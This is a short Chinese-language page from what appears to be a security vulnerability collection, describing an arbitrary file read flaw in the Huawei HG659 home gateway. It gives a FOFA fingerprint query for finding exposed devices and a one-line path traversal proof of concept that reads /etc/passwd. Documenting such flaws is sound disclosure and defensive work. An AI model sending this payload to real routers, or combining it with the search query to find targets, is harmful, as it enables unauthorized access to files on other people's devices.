menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 华为HG659 任意文件 读取漏洞 chevron_right 华为HG659 任意文件 读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    华为HG659 任意文件 读取漏洞.md
    471 B / 2021-07-15 19:46:39
        ## 华为 HG659任意文件读取漏洞

## 漏洞描述

华为 HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件

## 漏洞影响

> 华为HG659

## FOFA

> app="HUAWEI-Home-Gateway-HG659"

## 漏洞复现

登录页面如下:

![1](/resource/华为HG659任意文件读取漏洞/1.png)

###POC

```
/lib///....//....//....//....//....//....//....//....//etc//passwd
```

![2](/resource/华为HG659任意文件读取漏洞/2.png)
    links
    file_download